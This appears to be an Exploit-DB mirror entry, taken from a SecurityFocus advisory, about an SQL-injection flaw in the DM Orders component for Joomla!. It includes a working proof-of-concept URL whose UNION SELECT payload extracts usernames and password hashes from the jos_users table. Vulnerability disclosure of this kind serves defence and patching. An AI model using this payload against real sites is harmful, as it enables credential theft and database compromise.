exploit-db-mirror/platforms/php/webapps/33474.txt
Offensive Security 3a4999409a Updated 05_23_2014
2014-05-23 04:36:15 +00:00

7 lines
No EOL
587 B
Text
Executable file

source: http://www.securityfocus.com/bid/37655/info
The DM Orders component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1